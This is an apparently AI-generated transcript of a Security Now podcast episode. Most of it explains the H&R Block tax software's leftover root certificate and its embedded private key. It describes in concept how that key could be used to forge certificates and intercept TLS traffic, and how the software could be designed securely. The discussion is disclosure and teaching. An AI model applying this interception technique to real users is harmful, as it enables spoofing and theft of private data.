Transcripts

Security Now 1071 transcript

Please be advised this transcript is AI-generated and may not be word for word. Time codes refer to the approximate times in the ad-supported version of the show.

 

Mikah Sargent [00:00:00]:
Coming up on Security Now, Steve Gibson is here and I am filling in for Leo Laporte. Kick off the show with H&R Block's tax software. Well, it's doing something pretty wild and Steve has a suggested fix for it. We also talk about what happens when breathalyzer firmware needs to be calibrated. Plus, Russians want Telegram and WhatsApp to return to Russia. And very important, we finally learn what Buck what pocket squatting means and what can be done to fix it. All of that plus so much more coming up on Security Now.

Steve Gibson [00:00:38]:
Podcasts you love from people you trust. This is TWiT.

Mikah Sargent [00:00:50]:
This is Security Now, episode 1071 with Steve Gibson and me, Micah Sargent. Recorded Tuesday, March 24th, 2026. Bucket squatting. It's time for Security Now. And if you're hearing this voice and going, that's not Leo Laporte, well, good for you. You've got a good ear for voices. I am Micah Sargent. Leo Laporte is not here with us this week.

Mikah Sargent [00:01:14]:
He'll be back, don't you worry. But until then, I am excited to be joined by the ever-knowledgeable Steve Gibson. Hello, Steve.

Steve Gibson [00:01:25]:
Micah, great to be with you again. Uh, Leo told us last week that he— that the RSA conference is going on in San Francisco, and so he and Lisa are there, uh, uh, shaking hands with, uh, past and present and maybe even future advertisers for absolutely security-related things. So, uh, glad to have you, uh, filling in for him.

Mikah Sargent [00:01:49]:
Uh, it's always a pleasure to get to join you.

Steve Gibson [00:01:51]:
Well, yeah, and you know, once upon a time when we had Father Robert, he was our, our, uh, backstop for Leo, and now we got you, so that's great.

Mikah Sargent [00:02:00]:
Yeah, good to be here. Now, so good, go.

Steve Gibson [00:02:05]:
I was just gonna say, this is Security Now episode 1071 for March 24th, 2026, 2 days as it happens before, uh, my 71st birthday. So, wow, uh, I will be— yeah, uh, I feel great.

Mikah Sargent [00:02:23]:
So good, happy early birthday!

Steve Gibson [00:02:26]:
And I'm glad we're doing Security Now episode 2000 before, uh, very much longer. Um, the, uh, today's episode is titled Bucket Squatting. For— and this has nothing to do with like something you have to do when you're camping, uh, this is about, uh, an interesting problem that Amazon has had for years, which it turns out represents a surprisingly serious security vulnerability, which we're going to cover in detail. Um, but wow, there's a bunch of other really cool things that have happened, uh, in the last week. Um, it turns out that H&R Block's tax software, their I think it's that— I think they call it the Enterprise 2025 tax stuff, is doing something that is so very wrong. Also, a cyberattack has hit a company called Intoxibloc, which provide breathalyzers to enable the ignition systems on automobiles whose drivers Need to prove their sobriety before driving. That's an interesting story. We've also got Firefox now, as of today, we should be at Firefox 149 as of today, offering a free built-in VPN.

Steve Gibson [00:03:55]:
Also, TikTok and Meta's tracking pixels turn out to be doing much more than we believed. Russian citizens are begging to get their instant messaging back, which, you know, Telegram, WhatsApp, and so forth. Which, uh, the Russian government have said no, no messaging for you. Uh, we've also got the lack of wisdom of connecting your crypto wallet to an unknown service. Yet another— and what would a Security Now podcast be if we didn't have a Cisco CVSS of 10.0? Yes, you're just getting them confused at this point because there's so many of them. Uh, but Cisco's not alone. Ubiquiti also had a 10.0 CVSS critical flaw that needs to get patched. We got some interesting listener feedback.

Steve Gibson [00:04:45]:
And then what is exactly bucket squatting and what can be done to prevent it? So, you know, maybe we have some things to talk about this week. I don't know.

Mikah Sargent [00:04:56]:
Sounds like it. Sounds like there might be a few things to talk about. I'm looking forward to learning about bucket squatting. I'll tell you that. Uh, you know, it's, it's a good exercise move, surely. Works on the—

Steve Gibson [00:05:07]:
that's the thighs. That's true. Strengthen those whatevers.

Mikah Sargent [00:05:13]:
Yeah, exactly, the whatevers. Uh, but, but as you all know, this is the time where after our wonderful summary of what's to come, we take a moment to cut to an ad break, and Leo will be here for you for that.

Steve Gibson [00:05:30]:
Hi, Leo.

Leo Laporte [00:05:32]:
Hi, Micah. Hi, Steve. Sorry I couldn't be here. I'm at RSA right now having a great time, I'm sure. But I did want to come back and tell you about our sponsor for this episode of Security Now, Hoxhunt. Actually, I'm meeting with them at RSA in just a little bit. As a security leader, uh, you've been there. The eye rolls during training.

Leo Laporte [00:05:51]:
You're making us do this. The one-size-fits-all phishing simulations. That your employees spot a mile away. They don't learn anything from that. And that report button that gets ignored more often than not. Your programs are running, but it's not changing employee behavior. And isn't that what it's all about? Meanwhile, AI is making real attacks more convincing by the day, and leadership is starting to ask the question you don't have a clear answer to: is this actually working? Well, Hoxhunt is built To answer that, Hoxhunt empowers your employees to spot and stop phishing attacks. It drives measurable behavior change, and it does it in a fun way through personalized, gamified micro-training.

Leo Laporte [00:06:36]:
No more eye rolls. It's just engaging and fun, and it, and it's how people learn. It's powered by AI and behavioral science, and you'll love it as an admin because Hoxhunt does all the heavy lifting. The simulations run automatically and not just email. These days, gotta be everywhere. They run an email in Slack and Teams. It's like real phishing attacks personalized to each employee based on role, location, and behavior. Every simulation uses AI to mirror those real-world attacks, meaning employees are tested on what's actually getting through, not outdated templates they recognize immediately.

Leo Laporte [00:07:13]:
No messages from Nigerian princes. They know better than that now. Gamified training keeps engagement high without feeling punitive. You'll, your employees will love it and you'll love it too. And because every interaction generates a coaching moment, you're not just tracking completion, you're building behavioral indicators that tell a real story. You get reporting rates, repeat clicker reduction, and time to report, the kind of metrics that hold up when the leadership asks the hard questions. You could say, yeah, Got it right here. You don't have to take my word for it.

Leo Laporte [00:07:49]:
With over 3,500 verified reviews on G2, Hoxhunt is the top-rated security training platform recognized for best results and easiest to use. It's also recognized as a customer's choice by Gartner, and thousands of companies use Hoxhunt. Qualcomm, DocuSign, Nokia— they trust Hoxhunt to train millions of employees worldwide. Visit hoxhunt.com/securitynow today to learn why modern secure companies are making the switch to Hoxhunt. That's hoxhunt.com/securitynow. Now back to the show.

Mikah Sargent [00:08:26]:
All right, thank you, Leo, uh, for that. Let us get into the show, the good stuff.

Steve Gibson [00:08:33]:
So, um, last week we— I, I showed this picture same picture that we have here but with a different caption. I, I thought this picture was so bizarre that I would just put it out to our listeners to say, give me an idea for a caption. Uh, and so that was the— that, that was a caption contest last week. Um, I got flooded with a huge range of very fun and creative bits of feedback. I settled on one which I like because clearly what we're seeing here with this insane communications telephone pole, a power pole, whatever the hell it is, it's beautiful. This, this demonstrates like what, 50 years of accumulation? Clearly this did not happen in a day, right? It used to be Initially, when that pole was erected and the first lines were run to it, I'm sure down there in the core, buried deeply, is what was there originally. Beautiful. Probably made sense.

Steve Gibson [00:09:48]:
You could take a look at it and see what was going on. Everything, you know, it was like, it was perfect. Then like, oh, but wait a minute, we need to add another trunk line. So, okay, tack that onto the side and, and wire it in. And then who knows how many decades pass and you end up with what could, you know, affectionately be called a rat's nest of wires. So I gave this—

Mikah Sargent [00:10:15]:
it's a rat king's nest. You know what a rat king is?

Steve Gibson [00:10:18]:
Yeah. Yeah. I gave— and there's some poor worker guy up there on the top, like, trying to add just one more wire. I just need one more wire to detail. Anyway, so I gave this thing the caption, a contemporary visualization of the Microsoft Windows codebase.

Mikah Sargent [00:10:38]:
This is the caption you added?

Steve Gibson [00:10:40]:
Yes, that's my caption.

Mikah Sargent [00:10:42]:
It's beautiful, Steve. I read that and I thought, yes, yes.

Steve Gibson [00:10:47]:
Oh, I think that— and I mean, that's what we see with Windows, right? I mean, and in all fairness, it's not just Windows. It's any old code base that has been evolving over time where you can't really throw away the old code because it's working and things depend upon it being the way it is. So we're just going to add to it. We're going to, you know, you know, and we've got, you know, Windows now has multiple APIs. I hear Paul Therot talking about how, you know, oh, nobody codes to that API anymore. Well, of course I do, but not, uh, you know, other normal coders. So anyway, I thought this was a great caption. Uh, it's a variation on an idea that I got from one of our listeners, so thank you, uh, for that.

Steve Gibson [00:11:37]:
And thank you everyone for sharing your ideas. Okay, so this first goodie is where we're going to spend some time this morning because— or this podcast— because, uh, There's a lot here to unpack, and I really think our listeners are going to find this interesting. The first mention of this goes to a listener, a credit for the first mention, Jack Christiansen, who first pointed me at this. Since then, the Hacker News and other security outlets have picked up on this and shared it. Jack provided a note with included a link to the original Y Combinator posting whose Chinese author, a guy named Yifan Lu, Y-A-F-A-N, last name Lu, L-U, Yifan Lu. He appears to know his way around TLS and web servers, as we will see. So here's what Yifan posted to Y Combinator last week. He said, just a— he said PSA, but we know that stands for public service announcement— for folks here in the US, because tax season is coming up and some of you may be using— uh, it's Business, not Enterprise— HR Block Business 2025.

Steve Gibson [00:13:06]:
He said, I discovered that the software Get a load of this, folks. I discovered, he wrote, that the software installs a root CA named WKATX Server Host 2024. So a root certificate authority, WKATX Server Host 2024, with an expiration in 2049. Yes, 23 years from now. He said, into your local machine's trusted root certificate store. They also helpfully include the private key to this certificate in a DLL file. He says this certificate does not identify itself as H&R Block anywhere and does not get uninstalled when you uninstall the software. He said, I've been able to successfully use this root CA plus MITM proxy, which is a software package, man-in-the-middle proxy, to manipulate TLS traffic on a brand new virtual machine on the same network with a DNS spoofing attack.

Steve Gibson [00:14:35]:
And he gives us then a link in his posting to a YouTube video, and I've got the link in the show notes for anyone who's interested. He said, to test if your machine is vulnerable, visit this page. And now we have a URL to a, a host on his domain. It's https:// hr, as in, you know, H&R Block, hrbackdoor.yafanlu.com. So this is a TLS, a secure HTTPS secure connection to a web server on his domain. That is carrying a certificate he made using this root CA that was installed in everyone's machine who has H&R Block Business 2025, thanks to the fact that they also provided the private key for this root certificate, which you shouldn't— which should never be there. Anyway, he says Go to this URL. And if you do not get any warning or error message from your browser, then you have the backdoor installed.

Steve Gibson [00:16:01]:
Okay, now it's not really a backdoor. I understand. But I think that's a popular term. It's frightening and scary, as we'll see. I don't get how this is a backdoor, but it's not a good door. You know, maybe a side door. He said, if your browser does complain, you can choose to visit the page anyway for more details on the vulnerability. And I did.

Steve Gibson [00:16:31]:
And I'll tell you about what I found in a second. So he says, is it negligence or a real backdoor? It's impossible to tell. And since the private key is out there, anyone can use it. So the point is moot. There's no legitimate reason, and boy do I agree, and as we'll see, I'm going to demonstrate how we don't need this, why they need to install a wildcard root CA under a different name. When I contacted them, and I'll be sharing the timeline of that later, when I contacted them about it, their statement includes, quote, similar findings have been identified through internal security assessments, unquote. He said, meaning they know about this issue but have not fixed it. He said, I would not trust H&R Block software at this point.

Steve Gibson [00:17:32]:
If you did not get bit by this, congratulations. He said, see this post as a reminder to audit your trusted root CA store. That is, in other words, take this post as a reminder to go take a look and see what cruft things may have installed behind your back for their own purposes. Because unfortunately, as this demonstrates, that can happen. And it's not good. Okay, so let's reverse engineer this to figure out what's going on here. First, um, let's— again, I want to be very clear that having H&R Block install its own root certificate into the certificate authority root store of every single person who installs their tax preparation software, and then— I mean, that's bad enough, but then even worse, to leave it there forever with an expiration date in the year 2049. And you know, Micah, I do think the podcast will probably not last that long, so we're not going to be here to celebrate the expiration of the H&R Block root certificate.

Steve Gibson [00:18:51]:
Um, so this will remain valid for the next 23 years. Doing that on, by, on H&R Block's part is the height of hubris and irresponsibility.

Mikah Sargent [00:19:05]:
I mean, I don't, I don't want a spoiler, so if, if you are going to talk about this, then you can just say that it'll be a spoiler. But I know that when it comes to the practically minded, particularly those in the security world, perhaps the motivation is not as important as the impact. But I would love to know Do you have any thoughts about why— what's the— why make this choice of a certificate that doesn't— is it just pure laziness? You talk about hubris and irresponsibility here. That just seems like, um, well, one would say that's a choice. I mean, they made a choice.

Steve Gibson [00:19:45]:
Yeah. And in fact, um, I'm going to explain—

Mikah Sargent [00:19:48]:
okay, good—

Steve Gibson [00:19:48]:
the dangers, and then I'm going to explain the reason for it And then we're going to show how it could— the same thing could be achieved in a completely secure fashion. So I've had a lot of fun with this because we've never— we've never in the 21 years of the podcast haven't seen this and, and, and gone into it. So it's a great opportunity to get ready, folks, really dig in. Yes. Okay, so, um, remember that the way all this works is that a root certificate has signed itself and has declared itself to be a certificate authority certificate. So certificates are— have a whole bunch of things they can be labeled, and they can also contain constraints on their own behavior. That is, constraints that they broadcast on what things they can be used for. So this is an unconstrained certificate authority certificate, which is the most important, most potent form of certificate you could have.

Steve Gibson [00:20:58]:
So just as with any root, you know, certificate authority certificate, the purpose of that certificate, that self-signed certificate, is to verify the signature of any other certificate that it might have signed using its matching private key. It contains the public key, so its private key signs something which the root certificate's public key can be used to verify. So it can verify, but it can't itself sign. That's the beautiful— the, the beauty of this public key, you know, division of labor between private and public keys. So the CA's private key consequently, like, like, like for DigiCert, right? They're a CA. Their private key is the most prized, protected, and safeguarded piece of information anywhere, since any certificate which that super secret protected private key signs will be trusted anywhere that its matching CA certificate containing its matching public key is installed. Okay, so keeping the private key secret is like so important. Did H&R Block at least keep its installed CA certificate private key secret? Well, no.

Steve Gibson [00:22:30]:
Yifan told us no. Not even a little bit. This intrepid researcher discovered the CA certificate's never-to-be-disclosed matching private key sitting comfortably in a DLL that was included as part of this software's installation. We can be certain that this is true since this researcher used the matching CA's private key, which he found in the DLL, to create and sign his own standard TLS web certificate, just like a CA would, like a certificate authority, like DigiCert did when GRC got its most recent certificate. That's what, what it does. So he created a TLS web certificate using the private key that he found in the DLL in order to create that backdoor.yifanlu.com website, which anybody who installed the H&R Block software can now go to because their machine, their browsers will all trust this certificate that he made for himself. When I went there, Since I didn't install this H&R Block software, Firefox freaked out, as it should, warned me that the site was attempting to use an untrusted certificate signed by an unknown issuer and that I should proceed no further. I put a— I put the dialog box in the show notes.

Steve Gibson [00:24:09]:
It says, so this is from Firefox, someone could be trying to impersonate the site and you should not continue. Websites prove their identity via certificates, writes Firefox. Firefox does not trust hrbackdoor.yifanlu.com because its certificate issuer is unknown, meaning to my computer. Firefox said the certificate is self-signed or the server is not sending the correct intermediate certificates. And so then we get the error code SEC error, security error, unknown issuer. And you, you have a link, then you can click on view certificate and see the certificate where we, we see that everything that Yifan Lu has told us is true. So this is all exactly what we would want and expect from any browser, and it's what we should receive because As I said, I never made the mistake of installing H&R Block's 2025 tax prep software. But what's significant is that anyone who has ever previously installed H&R Block's, you know, business 2025 tax prep software, from now and for the next 23 years, while their purposefully installed CA root certificate remains valid, would not and does not receive any warning or notification at all.

Steve Gibson [00:25:47]:
Their web browser simply opens that page without complaining. Yifan Yu's, you know, self-cert-created page, because the signer of Yifan's demo test site certificate will now be known and trusted by their PC because once upon a time, maybe recently, maybe up to 23 years in the future, they had installed HR Block's software. Okay, so, so far this is all just happy demonstration test land, right? The reason Yifan has raised the alarm is that the inherent dangers extend far beyond testing, since in addition to installing an untrusted, uh, an untrustworthy certificate authority cert into every PC root store, as I said, and he's proven, H&R Block thoughtfully provided their CR's matching private key. Consequently, Anyone anywhere in the world can generate their own TLS web certificates or code signing certificates, any kind of certificate, because there's no constraint on the use of this, that will be trusted without question by any previous user of H&R Block's tax preparation software and for the next 23 years. For example, Nothing prevents someone from signing a TLS certificate for www.google.com or update.microsoft.com or any other web domain they might choose. If traffic can then be rerouted to that maliciously named and now fully trusted server, anyone who had previously installed the H&R Block tax preparation software could be fully spoofed. Their browser would go to web pages at those URLs, they would see matching trusted certificates and be fully spoofed. Now, presumably H&R Block has digitally signed their software, but any of their users who had previously installed their tax preparation software would also now be completely spoofable.

Steve Gibson [00:28:18]:
Their customers' PCs would download and blindly trust any subsequent software from any source that was signed with a certificate that had been issued with their private key. The code signing certificate could say H&R Block or it could say Microsoft Corporation or anything else that fit the malicious need of the moment. Yifan also said in his original Y Combinator posting, he said, quote, I've been able to successfully use this root CA and MITM proxy to manipulate TLS traffic on a brand new virtual machine on the same network with a DNS spoofing attack. So let's look at that. We've talked a lot about so-called middle boxes through the years. Many corporations use them to allow deliberate MITM, you know, man-in-the-middle interception, in order to examine 100% of the traffic that's passing into and out of their networks. They want to protect their employees inside their protected perimeter from anything malicious cruising into their network under the protection of TLS encryption. And they'd like to prevent corporate trade secrets from being sent out through their network, either inadvertently or deliberately.

Steve Gibson [00:29:54]:
Thanks to the same TLS encryption. So to accomplish this, every PC operating inside their corporate network environment must contain the root certificate for that middle box. In other words, a CA root certificate for that middle box. And we hope that it's matching, you know, well protected inside the matching private key, um, is not extractable. So having all PCs in the enterprise containing that middle box's root certificate, and with it having the matching private key, which it's careful never to let anybody else get, that allows the middle box to synthesize fake trusted remote website certificates on the fly. So here's how that works. Uh, say that someone inside the enterprise attempts to go to chatgpt.com. The middlebox will intercept that connection attempt, and it itself will go to chatgpt.com on behalf of the user to obtain ChatGPT's TLS certificate as if it were a user connecting.

Steve Gibson [00:31:20]:
It will duplicate many of the details of ChatGPT's certificate, but it will sign that new cloned certificate with its own internal private key. And it will then return that cloned certificate to the enterprise user. Who will believe they've connected directly and privately to ChatGPT. Their browser will show www.openai or chatgpt.com or whatever the URL is. However, they've actually connected to their enterprise's middle box, which is masquerading as ChatGPT, which it can do because their PC contains that root CA for the middlebox. Therefore, middlebox-created certificates are trusted inherently. Um, now all of this may seem like a lot to go through, but it's the only thing that allows the enterprise to monitor the TLS-encrypted communications of its employees to prevent them from, for example, uploading the company's 10-year product planning in order to ask ChatGPT what it thinks about those plans. Those should not leave the enterprise, so somebody needs to guard those communications.

Steve Gibson [00:32:48]:
Um, Yifan's point about the installation of a root certificate and man-in-the-middle proxy is that for reasons that are not at all clear. H&R Block has thereby, by doing what they've done, they've given themselves all of the same privileges and capabilities as any enterprise middle box on their customers' computers. The question is why?

Mikah Sargent [00:33:23]:
Too much power.

Steve Gibson [00:33:25]:
Yes. They could intercept all of their customers' communications to any other website.

Mikah Sargent [00:33:34]:
Oh my God, why would you want that? Yes, level—

Steve Gibson [00:33:37]:
why would you want the responsibility?

Mikah Sargent [00:33:39]:
Yeah, having that—

Steve Gibson [00:33:40]:
I like—

Mikah Sargent [00:33:41]:
yeah, thank you.

Steve Gibson [00:33:44]:
The only reason H&R Block would need to include the private key that matches the CA root certificate they installed into their users' machines would be if they needed to create and sign TLS certificates on the fly that would be trusted by that user's machine. I don't see any other possible need for the private key being locally present as it is. So again, why? Why is it H&R Block have given themselves the capability for wholesale local machine invasive traffic interception and decryption? And there doesn't appear to be any reason why tax preparation software would need anything like this. And even if we trust H&R Block and assume that they must have some justifiable basis for having given themselves this capability on every one of their customers' machines that have installed their software, as Yifan himself demonstrated, they will also have given anyone else, anyone else like him, this researcher who is aware of this, the same privileges since the CA root cert is installed and its matching private key is sitting in a DLL for anyone to extract and use. I mentioned at the top that we were going to reverse engineer this in an attempt to understand what's going on. I haven't seen this H&R Block software, and I don't, I, I don't want to let it anywhere near any of my machines, right? So I have not watched it work. But the only reason I can see that they would do this would be if their software installs and runs a local web server in their user's machine. This would allow them to have a fully web browser-based user interface and a, a, a UI-free headless web server that encapsulates all of their tax preparation logic.

Steve Gibson [00:36:16]:
In other words, we, we go to Google Docs in order to use Google's document application. It would be possible to instead go to H&R Block software server with our browser running on our machine to use their tax prep application delivered to us by a server running locally. So clicking, for example, some sort of little startup app would invoke the Windows shell to launch the user's default web browser with a URL like https://127.0.0.1 colon and then like some port number 1234 or some custom port number, whatever they wanted to use, you know. Or they might have also tweaked the user's hosts file to map a more friendly looking domain name like hrblock-tax-prep.com. Mapping that to 127.0.0.1 IP. That way users would see something comforting in their web browser's URL address bar. But none of that actually explains why they couldn't then just install a root CA and a certificate for that. There's no need to make it up on the fly.

Steve Gibson [00:37:54]:
I mean, I'm kind of like, I'm giving them the benefit of every possible excuse here.

Leo Laporte [00:38:00]:
Okay.

Steve Gibson [00:38:00]:
So now the user clicks on the startup app, which launches their web browser, which accesses their locally running web server. That built-in local web server needs to present their browser with a TLS certificate that matches the address they've accessed. Again, 127.0.0.1 or hrblocktaxprep.com or whatever. Whatever the case, that certificate needs to be trusted by the browser. This means that it must have been signed by the private key that matches the root CA certificate that HR Block planted into every user's PC. Since the root's subject name— the root— that root certificate subject name, as Yifan told us, is WK ATX server host 2024. Okay, it seems unlikely that it would be, you know, used directly as the server's end certificate. That would be a weird string for users to see in their browser's URL bar.

Steve Gibson [00:39:09]:
It's more likely that the installation process, or perhaps, you know, maybe the first time you run the system, that it would create the built-in web server certificate, which it would have, which it would then have signed using the root CA's private key, which we know is sitting in a DLL. And this is exactly, as I said, what Yifan Lu did when he created his test site. Once all this was done, The built-in web server would offer the user's browser this custom-minted TLS certificate, and it would use that certificate's private key, which it must— the web, the, the web server would have that key to verify its valid ownership of the certificate it provided to the browser. The point I want to make here is that any web server that's accepting and terminating TLS connections does need to have the private key that matches the public key in the certificate which it provides to the web browser. But that should never be the private key for the CA root certificate. No one does that, right? There is the, the only thing the root signs is another certificate which is then presented to the web browser. It, it itself is never used, thus you never need its private key to be around. Okay, so when all this was like revealed, when, when Yifan found all this, he did the right thing and reported his astonishment and concerns to H&R Block.

Steve Gibson [00:40:58]:
The timeline of his interactions with them was on March 10th. So today's what, the 24th? So 2 weeks ago today on the 10th, uh, he disclosed to H&R Block through their responsible disclosure policy. 2 days later on March 12th, he was asked to, quote, please provide more details about how an attacker would realistically exploit this in practice, unquote, and, quote, share the video proof of concept from start to end, unquote. 3 days later, he'd— on the 15th, he did that. He wrote, provided H&R Block with details and a proof of concept video and told them the deadline for their response is March 20th due to U.S. tax season coming up. On the 20th, he received the following statement back from HR Block: After review with the program team, we're closing this report as out of scope. The reported issue involves an executable application that falls outside our defined program scope, and similar findings have been identified through internal security assessments.

Steve Gibson [00:42:25]:
Okay, what? So like, yeah, we know. Like, uh, really? Somebody actually explained this to you and you're like, eh, that's how it's supposed to work. Okay, okay, so this is obviously pretty much a head-buried-in-the-sand response, right? They deserve to receive full scrutiny over this very wrong-headed design of their system, and I hope they receive that. There can be no doubt that the use of their tax preparation software leaves an uninvited, unwanted an unconstrained root certificate with a 23-year lifetime remaining and its known private key sitting in the root store of every customer of their tax preparation software, and it persists even after their software has been uninstalled. Okay, now the one thing we've not examined is what I would do, I, Steve Gibson, if, if I were told, you know, or if I were contracted with to do this in a secure fashion. So, Micah, let's take a break and then we're going to look at that, how to do this right.

Mikah Sargent [00:43:52]:
I am looking forward to hearing how we can do it right after seeing how you can do it so, so wrong. But let's take a break. Uh, Leo Laporte joining us for the next sponsor.

Leo Laporte [00:44:04]:
Hi guys, real quick, this episode of Security Now brought to you by GuardSquare. Mobile apps today— well, you just listen to the show, you know they've become an inescapable part of life. We use them all the time, ranging from financial services to healthcare, retail, entertainment. And of course, users trust mobile apps with their sensitive personal data. But a recent survey showed that 72% of organizations experienced a mobile application security incident last year, and 92% of respondents reported rising threat levels over the last 2 years. Doesn't take a survey to know that, right? Now, if you're an app developer, you got to remember your users are trusting you and attackers want your users' personal data. So they're constantly finding new ways to attack your mobile app. This is one really awful thing they do.

Leo Laporte [00:44:56]:
They reverse engineer it— easy now using, uh, AI. They'll repackage it. They'll distribute your app modified via phishing campaigns, via sideloading, by third-party app stores— any means necessary. And then your users get compromised, and who they blame? They blame you. But by taking a proactive approach to mobile app security, you can stay one step ahead of these attacks. And maintain the trust of your users. That's where GuardSquare comes in. GuardSquare delivers mobile app security without compromise, providing advanced protections for both Android and iOS apps, combined with automated mobile application security testing to find vulnerabilities and real-time threat monitoring to gain insight into attacks.

Leo Laporte [00:45:43]:
You're not helpless anymore. Discover more about how GuardSquare provides industry-leading security for your mobile apps at guardsquare.com. That's guardsquare.com. We thank them so much for supporting Security Now. And now back to Micah and Steve.

Mikah Sargent [00:46:00]:
Guys, thank you very much, Leo, for that. Uh, we are joined once again by Steve Gibson as we continue on with understanding what we would do, uh, if tasked with fixing things for each of our blogs.

Steve Gibson [00:46:13]:
Okay, so If I— so first of all, let me reiterate that I'm sort of— I'm like trying to give these guys every benefit of the doubt. I, I don't understand why they've done this. Um, the only real reason that I can imagine is actually traffic interception. They would need this to act like you know, in order to act like a middle box to intercept encrypted communications. Maybe— and again, I've not seen the software— maybe they set themselves up and then their app says, okay, now go to irs.com, go to your bank's website, go— I mean, like, maybe there are remote cloud-based sources of information which it asks you to look at, and while intercepting your communication so that it can suck that stuff in and incorporate it into your tax preparation. I don't know. I mean, it's like, that's like the only thing I can imagine. Now, still horrible.

Steve Gibson [00:47:29]:
I mean, you don't want a proxy that's able to to intercept all of your TLS connections installed on your machine, let alone left behind after you've uninstalled it. But that's the only thing I can imagine. So, and, and if, and also, if all they wanted was to be able to run a local web server that your browser trusts, then they would need to install their own root cert, and the web browser would then have a certificate that that root cert has signed. But there would never be the root cert's private key because it wouldn't be necessary. And the only thing that certificate would do would, would be to run a local web browser. You know, web app developers do this all the time. They run a local web server on their machine It's not a big deal. So H&R Block could have done that if that's— that's all they would have needed to do, and it could have been safe.

Steve Gibson [00:48:36]:
But say that for some reason they did need to deploy this on the fly. Even that could be done securely, and here's how. Um, if I wish to deploy a product that included a built-in web server that a user's modern, fully secured web browser could interact with without raising any warnings about insecure connections, lack of trust, self-signed certificates, and so on. It's possible. So, H&R Block, are you listening? Upon installation, the installing software would first generate a state-of-the-art standard 4096-bit public-private key pair. Um, they would not ship that with the product. In other words, this thing that H&R Block did was they provided a public key in a, in a root CA and the private key bundled into, bound into the DLL. So they shipped those statically.

Steve Gibson [00:49:45]:
Which means anyone who gets a copy of one has what they need for all H&R Block users, which is where the problem is. No, instead generate it on the fly. Generate your own 4096-bit public key pair on the fly so that no two installations ever share the same keys. The public key half would be contained within a, to your point, a short-lived root certificate, you know, having a lifetime of the expected duration of the product's use, maybe 90 or 120 days for tax preparation software. Micah, as you pointed out, there's no reason for it to live any longer.

Mikah Sargent [00:50:34]:
Yeah, especially because people are going to reinstall it again the next— if they uninstall or something, The theory is they're going to install it again and use it again next year.

Steve Gibson [00:50:42]:
And since it's able to make a certificate, if it did expire, it could just make a new one. Yeah, even it itself could just bump this along forward, you know, always installing a few months' worth of root CA that will gracefully, properly expire after a few months. You'd like to have the uninstaller remove it because you don't want to just have just all this crap accumulating in your, your user's root stores. But okay, um, in addition, it should tightly constrain the use of the certificate so that it can only ever be used to sign a TLS end certificate. Those are constraints that could be added to the CA. They didn't do that either. Okay, next. It generates a second 4K-bit public-private key pair.

Steve Gibson [00:51:39]:
It uses this second key pair to create the web server's local site certificate. So that's for— that's going to be— that, that's the certificate for the server that the server will send to the browser, to the, to the user's local browser. And it would name it something like, you know, HR Block localhost. That would be a safe name..localhost is reserved for the localhost as a sort of a localhost pseudo domain. So hrblock.localhost, which would mean that certificate could never be misused, um, in, in any, uh, useful fashion. It would only ever be able to serve and encrypt and authenticate TLS connections. In order for this local site certificate to be trusted on that local machine, it needs to be signed by the root certificate's private key, that first one that was made, you know, the one belonging to the just-created local root CA. And then here's what's crucial and cool.

Steve Gibson [00:52:49]:
Immediately after that root CA's private key was used to sign the local site certificate, that private key is securely overwritten and deleted. The point is that private key is never written to non-volatile storage, so it is now permanently gone, and the locally installed root certificate can never be abused because its matching private key, which is required for its abuse, no longer exists. It was just— it was ephemeral, it was transient, it's gone. Since its private key was only ever needed once to sign the local certificate to prove that certificate's validity, it should never be retained. So the installation then in my system would— in my solution would add an entry to the system's hosts file which maps hrblock.localhost to 127.0.0.1. So now we have a certificate named hrblock.localhost with a unique public and private key pair that will only ever be trusted by by a similarly unique root CA, which will itself expire a few months after it was created. Any local browser can now be directed to some unique port, I guess 80 if it's free, but you might want to do, you know, 8888 just to, for the sake of being out there somewhere. So, you know, hrblock.localhost:8088.

Steve Gibson [00:54:35]:
8888, and now you're able to access the built-in web server in order to view the HR Block UI, uh, in a server-client relationship. And lastly, on its way out, the software's uninstaller should remove the short-lived root CA certificate after it shuts down the local web server. And deletes all of the products files. So as we've just seen in this example, it is— if you really needed to do this for some reason, I don't see even why you have to, because you could just, you know, give somebody a set of static certs that would only be useful for local— for hrblock.localhost. But if you— even if you needed— if you wanted every instance to be unique, and I can see a benefit there it can be done in a way that does not open any security holes. But that's not what H&R Block has done. Through very poor security design, sloppiness, and as you said, apparently not caring, you know, they've left behind a 23-year lifetime completely unconstrained CA root certificate, meaning It can sign TLS web certificates. It can sign code.

Steve Gibson [00:56:02]:
It can be used for any malicious purpose you can imagine, left behind in the root store of every one of their users with its matching key statically embedded in a shipping DLL so that it's known to the world. Um, this makes you wish that our industry's software liability protections were not as virtually nonexistent as they currently are. I mean, I'm sure somewhere in the license agreement that all users click on, not reading because you can't, you know, it's 25 pages of legalese. You know, it says, you know, by using this software, you agree to hold us harmless of any damage that may arise, you know, even if we'd been informed beforehand that such damage could occur. The license agreements all say that. And so it's like, eh, we can do anything we want to your computer.

Mikah Sargent [00:56:58]:
That's so frustrating to me. And that, because I was going to say, you know, I'm always, I'm always curious. He reached, or this person reached out to H&R Block. H&R Block had to know that if this was coming from truly a security researcher, that this was going to be made public. As opposed to it just being some, you know, I would imagine that if you just heard from some random person that did not, you know, put themselves forth as a security researcher at all, they might go, "Oh, we can bury this," or, "This won't matter." But to say basically, "We don't care," to someone who is going to disclose, that's the stuff where I'm like, I want to meet every person involved in every part of these decisions and just hear what their thinking is. Because what is their thinking and why would they feel that this is not a big deal when you're showing us how it can quickly become a big deal and that the responsibility there is, is vast. But as you pointed out, it— with the right agreements in place, they don't need to care, do they? No, it's frustrating.

Leo Laporte [00:58:10]:
No.

Steve Gibson [00:58:13]:
Um, speaking of frustrating, the company known as Intoxalock— gotta love the name— provides court-mandated automotive breathalyzer facilities that are installed into the automobiles of people who a court has come to the determination should be required to provide proof of their alcoholic sobriety through a quick built-in breathalyzer breath sample every single time they get behind the wheel and wish to drive their car. Now, since alcoholic breathalyzer technology is tricky and can be a bit flaky, it requires periodic calibration for reliable operation by an authorized calibration facility. And the calibration facilities, it turns out, are all tied back to the mothership in the cloud that tracks and reports on all of this. Now, that whole system generally works pretty well, but it turns out only so long as a cyber attack does not render Intoxalock's entire periodic calibration and reporting infrastructure inoperative. This is exactly what befell Intoxalock Saturday before last on March 14th. So today is the 24th, a full 10 days later. Their calibration system remains offline. It's down.

Steve Gibson [00:59:58]:
